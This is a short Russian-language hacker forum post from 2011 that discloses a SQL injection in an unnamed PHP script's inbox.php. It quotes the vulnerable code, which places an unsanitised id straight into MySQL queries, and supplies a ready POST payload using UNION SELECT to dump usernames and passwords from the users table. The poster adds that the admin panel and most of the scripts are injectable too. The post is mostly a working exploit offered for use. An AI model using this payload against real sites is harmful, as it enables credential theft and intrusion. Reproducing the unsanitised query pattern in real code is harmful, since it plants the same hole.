Показать сообщение отдельно
Старый 08.02.2011, 13:14   #3
Online
 
Аватар для Online
 
Регистрация: 31.01.2011
Сообщений: 10
Репутация: 10
По умолчанию

SQL inj
if mq = off
Vuln file: inbox.php
PHP код:
///
    
if($action=='view')
    {
        require(
'config.php');
        
$res=mysql_query("select * from tb_mail where id='$id'");
        
$res=mysql_fetch_array($res);
        
mysql_query("update tb_mail set status='1' where id='$id'");
        
mysql_close($con);
        
?>

/// 
Exploit:
Код:
Отправляем POST'ом "action=view&id=-1' union select 1,2,3,concat_ws(0x3a,username,password),5,6,7 from tb_users limit 0,1+--+"
В админке и почти во всех скриптах инъекции присутствуют =)
__________________
Чем больше ты имеешь, тем с большей жадностью стремишься к тому, чего у тебя нет. Война у тебя рождается из побед.
Online вне форума   Ответить с цитированием